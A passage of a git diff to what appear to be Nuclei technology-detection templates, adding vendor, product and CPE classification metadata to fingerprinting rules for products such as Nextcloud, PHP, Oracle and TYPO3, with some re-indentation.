+46,4 @@ http: part: body regex: - '"version":"(\d+\.\d+\.\d+)"' -# digest: 4a0a00473045022100abe86389e57046654d736df0d6fc80179ded16ae5ca83c00f4cecefa704d26bb022021f3a4d646cf9437cdf2d8bb13d47a739d0ec49d7ed4dbc9ef9491b152219914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abe86389e57046654d736df0d6fc80179ded16ae5ca83c00f4cecefa704d26bb022021f3a4d646cf9437cdf2d8bb13d47a739d0ec49d7ed4dbc9ef9491b152219914:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/nextcloud-detect.yaml b/http/technologies/nextcloud-detect.yaml index c7ec436575..27b8824455 100644 --- a/http/technologies/nextcloud-detect.yaml +++ b/http/technologies/nextcloud-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 4 shodan-query: http.title:"Nextcloud" + product: nextcloud_server + vendor: nextcloud tags: tech,nextcloud,storage + classification: + cpe: cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/nextcloud-owncloud-detect.yaml b/http/technologies/nextcloud-owncloud-detect.yaml index 9b12806a06..0ecd99d44f 100644 --- a/http/technologies/nextcloud-owncloud-detect.yaml +++ b/http/technologies/nextcloud-owncloud-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"owncloud" + product: owncloud + vendor: owncloud tags: tech,owncloud,status + classification: + cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: json json: - .version -# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/nexus-detect.yaml b/http/technologies/nexus-detect.yaml index 40ae05fc13..194d64704c 100644 --- a/http/technologies/nexus-detect.yaml +++ b/http/technologies/nexus-detect.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"Nexus Repository Manager" + product: nexus_repository_manager + vendor: sonatype tags: tech,nexus + classification: + cpe: cpe:2.3:a:sonatype:nexus_repository_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/notion-detect.yaml b/http/technologies/notion-detect.yaml index 95854534fa..ec500901bf 100644 --- a/http/technologies/notion-detect.yaml +++ b/http/technologies/notion-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Notion – One workspace. Every team." + product: notion + vendor: notion tags: notion,tech + classification: + cpe: cpe:2.3:a:notion:notion:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/ntop-detect.yaml b/http/technologies/ntop-detect.yaml index c37f92dd1e..ae463f5cc7 100644 --- a/http/technologies/ntop-detect.yaml +++ b/http/technologies/ntop-detect.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"welcome to ntop" + product: ntopng + vendor: ntop tags: tech,ntop,panel http: diff --git a/http/technologies/open-journal-systems.yaml b/http/technologies/open-journal-systems.yaml index f81553a15e..c19a053f07 100644 --- a/http/technologies/open-journal-systems.yaml +++ b/http/technologies/open-journal-systems.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: html:"Open Journal Systems" + product: open_journal_systems + vendor: openjournalsystems tags: tech,ojs + classification: + cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/openhap-detect.yaml b/http/technologies/openhap-detect.yaml index a7fe79673c..32556c069f 100644 --- a/http/technologies/openhap-detect.yaml +++ b/http/technologies/openhap-detect.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"openHAB" + product: openhab_web_interface + vendor: openhab tags: tech,iot,openhab + classification: + cpe: cpe:2.3:a:openhab:openhab_web_interface:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/openproject-detect.yaml b/http/technologies/openproject-detect.yaml index e96f5f5652..5a614b0489 100644 --- a/http/technologies/openproject-detect.yaml +++ b/http/technologies/openproject-detect.yaml @@ -11,8 +11,12 @@ info: verified: "true" max-request: 3 shodan-query: title:"openproject" + product: openproject + vendor: openproject tags: tech,openproject,api,detect + classification: + cpe: cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/openssl-detect.yaml b/http/technologies/openssl-detect.yaml index bbfacdf4b5..fdffc08926 100644 --- a/http/technologies/openssl-detect.yaml +++ b/http/technologies/openssl-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: OpenSSL + product: openssl + vendor: openssl tags: tech,openssl + classification: + cpe: cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/oracle/oracle-dbcs.yaml b/http/technologies/oracle/oracle-dbcs.yaml index a6a7b300d2..8c33bf8030 100644 --- a/http/technologies/oracle/oracle-dbcs.yaml +++ b/http/technologies/oracle/oracle-dbcs.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Oracle Database as a Service" + product: database_server + vendor: oracle tags: oracle,tech + classification: + cpe: cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/oracle/oracle-iplanet-web-server.yaml b/http/technologies/oracle/oracle-iplanet-web-server.yaml index f7bb146ace..adafe3237f 100644 --- a/http/technologies/oracle/oracle-iplanet-web-server.yaml +++ b/http/technologies/oracle/oracle-iplanet-web-server.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: app="Oracle-iPlanet-Web-Server + product: iplanet_web_server + vendor: oracle tags: tech,oracle + classification: + cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/oracle/oracle-webcenter-sites.yaml b/http/technologies/oracle/oracle-webcenter-sites.yaml index 14cde31794..79e9fd9ae3 100644 --- a/http/technologies/oracle/oracle-webcenter-sites.yaml +++ b/http/technologies/oracle/oracle-webcenter-sites.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"WebCenter" + product: webcenter_sites + vendor: oracle tags: tech,oracle,webcenter + classification: + cpe: cpe:2.3:a:oracle:webcenter_sites:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/osquery-fleet-detect.yaml b/http/technologies/osquery-fleet-detect.yaml index aa29b766d4..6d1da8ad3a 100644 --- a/http/technologies/osquery-fleet-detect.yaml +++ b/http/technologies/osquery-fleet-detect.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:kolide:fleet:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-1529860313 + product: fleet + vendor: kolide tags: panel,fleet,osquery,tech http: diff --git a/http/technologies/payara-micro-server-detect.yaml b/http/technologies/payara-micro-server-detect.yaml index bd5b9573b0..c312a32254 100644 --- a/http/technologies/payara-micro-server-detect.yaml +++ b/http/technologies/payara-micro-server-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: 'title:"Payara Micro #badassfish - Error report"' + product: payara + vendor: payara tags: tech,payara + classification: + cpe: cpe:2.3:a:payara:payara:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/pbootcms-detect.yaml b/http/technologies/pbootcms-detect.yaml index 52ee2f12b7..4cf2c45812 100644 --- a/http/technologies/pbootcms-detect.yaml +++ b/http/technologies/pbootcms-detect.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"PbootCMS" + product: pbootcms + vendor: pbootcms tags: tech,pbootcms + classification: + cpe: cpe:2.3:a:pbootcms:pbootcms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/pexip-detect.yaml b/http/technologies/pexip-detect.yaml index 7ad0aaf7eb..bd98695b84 100644 --- a/http/technologies/pexip-detect.yaml +++ b/http/technologies/pexip-detect.yaml @@ -1,5 +1,5 @@ -id: pexip-detect - +id: pexip-detect + info: name: Pexip - Detect author: righettod @@ -12,19 +12,23 @@ info: verified: true max-request: 1 shodan-query: http.title:"Pexip Connect for Web" + product: pexip_infinity + vendor: pexip tags: tech,pexip,detect -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "<title>Pexip Connect for Web")' + classification: + cpe: cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "<title>Pexip Connect for Web")' condition: and -# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/php-detect.yaml b/http/technologies/php-detect.yaml index 0f7daba169..65d194988d 100644 --- a/http/technologies/php-detect.yaml +++ b/http/technologies/php-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: "X-Powered-By: PHP" + product: php + vendor: php tags: tech,php + classification: + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/php-fusion-detect.yaml b/http/technologies/php-fusion-detect.yaml index 2b91188891..4acdcb1044 100644 --- a/http/technologies/php-fusion-detect.yaml +++ b/http/technologies/php-fusion-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: title="PHP-Fusion" + product: php-fusion + vendor: php-fusion tags: php,tech,php-fusion + classification: + cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/phplist-detect.yaml b/http/technologies/phplist-detect.yaml index abeee78371..587d63f0f0 100644 --- a/http/technologies/phplist-detect.yaml +++ b/http/technologies/phplist-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"phplist" + product: phplist + vendor: phplist tags: tech,phplist,detect + classification: + cpe: cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/pi-hole-detect.yaml b/http/technologies/pi-hole-detect.yaml index c25b46aaaa..7468868d29 100644 --- a/http/technologies/pi-hole-detect.yaml +++ b/http/technologies/pi-hole-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 5 shodan-query: title:"Pi-hole" + product: pi-hole + vendor: pi-hole tags: tech,pihole,detect + classification: + cpe: cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/prestashop-detect.yaml b/http/technologies/prestashop-detect.yaml index 3cf62cc913..5bee19282e 100644 --- a/http/technologies/prestashop-detect.yaml +++ b/http/technologies/prestashop-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"PrestaShop" + product: prestashop + vendor: prestashop tags: tech,cms,prestashop + classification: + cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/privatebin-detect.yaml b/http/technologies/privatebin-detect.yaml index 89624275cc..696c6bded2 100644 --- a/http/technologies/privatebin-detect.yaml +++ b/http/technologies/privatebin-detect.yaml @@ -1,5 +1,5 @@ -id: privatebin-detect - +id: privatebin-detect + info: name: PrivateBin - Detect author: righettod @@ -12,27 +12,31 @@ info: verified: true max-request: 1 shodan-query: title:"PrivateBin" + product: privatebin + vendor: privatebin tags: tech,privatebin,detect -http: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "privatebin.js", "privatebin", "content=\"privatebin")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "privatebin.js", "privatebin", "content=\"privatebin")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'privatebin\.[a-z]{2,3}\?([0-9.]+)' -# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/projectsend-detect.yaml b/http/technologies/projectsend-detect.yaml index f4fb064d23..6fee8e0dee 100644 --- a/http/technologies/projectsend-detect.yaml +++ b/http/technologies/projectsend-detect.yaml @@ -12,9 +12,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: intext:Provided by ProjectSend + product: projectsend + vendor: projectsend tags: tech,projectsend,edb http: diff --git a/http/technologies/pypiserver-detect.yaml b/http/technologies/pypiserver-detect.yaml index 1c3a714388..64540cb611 100644 --- a/http/technologies/pypiserver-detect.yaml +++ b/http/technologies/pypiserver-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"pypiserver" + product: pypiserver + vendor: python tags: tech,pypiserver + classification: + cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/roundcube-webmail-portal.yaml b/http/technologies/roundcube-webmail-portal.yaml index c06ba40918..ec104fbe4c 100644 --- a/http/technologies/roundcube-webmail-portal.yaml +++ b/http/technologies/roundcube-webmail-portal.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 2 shodan-query: http.component:"RoundCube" + product: webmail + vendor: roundcube tags: roundcube,portal,tech + classification: + cpe: cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/rseenet-detect.yaml b/http/technologies/rseenet-detect.yaml index 4a788c516d..d794cb9861 100644 --- a/http/technologies/rseenet-detect.yaml +++ b/http/technologies/rseenet-detect.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"R-SeeNet" + product: r-seenet + vendor: advantech tags: tech,rseenet + classification: + cpe: cpe:2.3:a:advantech:r-seenet:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/rsshub-detect.yaml b/http/technologies/rsshub-detect.yaml index 3c3ed87164..d8d6ac9cd8 100644 --- a/http/technologies/rsshub-detect.yaml +++ b/http/technologies/rsshub-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1893514038 + product: rsshub + vendor: rsshub tags: tech,rsshub + classification: + cpe: cpe:2.3:a:rsshub:rsshub:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/samsung-smarttv-debug.yaml b/http/technologies/samsung-smarttv-debug.yaml index 8f9f3b8c72..08c80fb9a4 100644 --- a/http/technologies/samsung-smarttv-debug.yaml +++ b/http/technologies/samsung-smarttv-debug.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Debug Config" + product: nt14u_firmware + vendor: samsung tags: samsung,tech,iot + classification: + cpe: cpe:2.3:o:samsung:nt14u_firmware:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml index 0c8b94a09a..c922ea0ecc 100644 --- a/http/technologies/sharefile-storage-server.yaml +++ b/http/technologies/sharefile-storage-server.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"ShareFile Storage Server" + product: sharefile_storage_zones_controller + vendor: citrix tags: tech,citrix,sharefile + classification: + cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/shopware-detect.yaml b/http/technologies/shopware-detect.yaml index 381edf166e..509f4ed89c 100644 --- a/http/technologies/shopware-detect.yaml +++ b/http/technologies/shopware-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: title:"shopware AG" + product: shopware + vendor: shopware tags: tech,shopware,cms + classification: + cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/simplesamlphp-detect.yaml b/http/technologies/simplesamlphp-detect.yaml index 2cd1eff21c..cd67a94029 100644 --- a/http/technologies/simplesamlphp-detect.yaml +++ b/http/technologies/simplesamlphp-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: "http.title:\"SimpleSAMLphp installation page\"" + product: simplesamlphp + vendor: simplesamlphp tags: tech,simplesamlphp,detect + classification: + cpe: cpe:2.3:a:simplesamlphp:simplesamlphp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "you have successfully installed simplesamlphp", "simplesamlphp installation page", "/module.php/core/login-admin.php")' condition: and -# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml index 303bbce478..78040e3107 100644 --- a/http/technologies/sitecore-cms.yaml +++ b/http/technologies/sitecore-cms.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: title:"sitecore" + product: cms + vendor: sitecore tags: cms,sitecore,tech + classification: + cpe: cpe:2.3:a:sitecore:cms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/smartstore-detect.yaml b/http/technologies/smartstore-detect.yaml index 3fbff40d7a..376af8bd5e 100644 --- a/http/technologies/smartstore-detect.yaml +++ b/http/technologies/smartstore-detect.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 1 shodan-query: http.html:'content="Smartstore' + product: smartstore + vendor: smartstore tags: tech,smartstore,oss + classification: + cpe: cpe:2.3:a:smartstore:smartstore:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/snipeit-panel.yaml b/http/technologies/snipeit-panel.yaml index c33dda2d3e..96945515c3 100644 --- a/http/technologies/snipeit-panel.yaml +++ b/http/technologies/snipeit-panel.yaml @@ -9,9 +9,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:431627549 + product: snipe-it + vendor: snipeitapp tags: panel,snipeit,tech http: diff --git a/http/technologies/sogo-detect.yaml b/http/technologies/sogo-detect.yaml index 8f0ca9ea71..9f2581ad51 100644 --- a/http/technologies/sogo-detect.yaml +++ b/http/technologies/sogo-detect.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: http.title:"SOGo" + product: sogo + vendor: alinto tags: sogo,tech + classification: + cpe: cpe:2.3:a:alinto:sogo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml index 95c73e7dff..e6a0770856 100644 --- a/http/technologies/statamic-detect.yaml +++ b/http/technologies/statamic-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: "Statamic" + product: statamic + vendor: statamic tags: tech,statamic,detect + classification: + cpe: cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: part: header regex: - 'X-Powered-By:(.*)Statamic' -# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/subrion-cms-detect.yaml b/http/technologies/subrion-cms-detect.yaml index fd7d1aede9..bf156e5e20 100644 --- a/http/technologies/subrion-cms-detect.yaml +++ b/http/technologies/subrion-cms-detect.yaml @@ -8,8 +8,12 @@ info: max-request: 1 shodan-query: http.component:"Subrion" fofa-query: title="subrion" + product: subrion + vendor: intelliants tags: subrion,tech + classification: + cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/thinkphp-detect.yaml b/http/technologies/thinkphp-detect.yaml index 9100a16935..a838f2094f 100644 --- a/http/technologies/thinkphp-detect.yaml +++ b/http/technologies/thinkphp-detect.yaml @@ -9,11 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"ThinkPHP" fofa-query: app="ThinkPHP" + product: thinkphp + vendor: thinkphp tags: thinkphp,tech,detect,intrusive http: diff --git a/http/technologies/tibco-businessconnect-detect.yaml b/http/technologies/tibco-businessconnect-detect.yaml index 671e1e2a71..d88aa0886f 100644 --- a/http/technologies/tibco-businessconnect-detect.yaml +++ b/http/technologies/tibco-businessconnect-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"TIBCO BusinessConnect" + product: businessconnect + vendor: tibco tags: tibco,detect,tech + classification: + cpe: cpe:2.3:a:tibco:businessconnect:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - 'status_code == 200' - 'contains(header, "TIBCO BusinessConnect")' condition: and -# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/tibco-spotfire-services-detect.yaml b/http/technologies/tibco-spotfire-services-detect.yaml index 70e7a40c57..3a5574e781 100644 --- a/http/technologies/tibco-spotfire-services-detect.yaml +++ b/http/technologies/tibco-spotfire-services-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 4 shodan-query: "TIBCO Spotfire Server" + product: spotfire_statistics_services + vendor: tibco tags: tech,tibco,detect + classification: + cpe: cpe:2.3:a:tibco:spotfire_statistics_services:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: group: 1 regex: - 'Version\s+([0-9.\s\(\)V]+)' -# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/tileserver-gl.yaml b/http/technologies/tileserver-gl.yaml index 3f6a869798..6649acee3f 100644 --- a/http/technologies/tileserver-gl.yaml +++ b/http/technologies/tileserver-gl.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"TileServer GL - Server for vector and raster maps with GL styles" google-query: intitle:"TileServer GL - Server for vector and raster maps with GL styles" + product: tileservergl + vendor: tileserver tags: tech,tileserver,edb http: diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index a0cb2d92c8..d8100b3ea7 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: "Server: tinyproxy" + product: tinyproxy + vendor: tinyproxy_project tags: tech,proxy,detect + classification: + cpe: cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: kval kval: - server -# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/typo3-detect.yaml b/http/technologies/typo3-detect.yaml index 815a432bf8..2fddb0de99 100644 --- a/http/technologies/typo3-detect.yaml +++ b/http/technologies/typo3-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"TYPO3" + product: typo3 + vendor: typo3 tags: tech,typo3 + classification: + cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/utility-service-detect.yaml b/http/technologies/utility-service-detect.yaml index d100051f95..ad41ea7162 100644 --- a/http/technologies/utility-service-detect.yaml +++ b/http/technologies/utility-service-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Utility Services Administration" + product: aura_utility_services + vendor: avaya tags: tech,avaya,aura + classification: + cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/vbulletin-detect.yaml b/http/technologies/vbulletin-detect.yaml index e0b437b664..2dd52aaee4 100644 --- a/http/technologies/vbulletin-detect.yaml +++ b/http/technologies/vbulletin-detect.yaml @@ -12,8 +12,12 @@ info: max-request: 1 shodan-query: title:"Powered By vBulletin" google-query: intext:"Powered By vBulletin" + product: vbulletin + vendor: vbulletin tags: tech,vbulletin + classification: + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/versa/versa-analytics-server.yaml b/http/technologies/versa/versa-analytics-server.yaml index f18fc0086f..9afa4b5a40 100644 --- a/http/technologies/versa/versa-analytics-server.yaml +++ b/http/technologies/versa/versa-analytics-server.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: "Versa-Analytics-Server" + product: versa_analytics + vendor: versa-networks tags: tech,versa,analytics + classification: + cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/versa/versa-director-api.yaml b/http/technologies/versa/versa-director-api.yaml index 21754b276c..957ad7d470 100644 --- a/http/technologies/versa/versa-director-api.yaml +++ b/http/technologies/versa/versa-director-api.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: html:"Versa Networks" + product: versa_director + vendor: versa-networks tags: api,versa,tech + classification: + cpe: cpe:2.3:a:versa-networks:versa_director:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/versa/versa-networks-detect.yaml b/http/technologies/versa/versa-networks-detect.yaml index 20b1d17344..6ad5ffc272 100644 --- a/http/technologies/versa/versa-networks-detect.yaml +++ 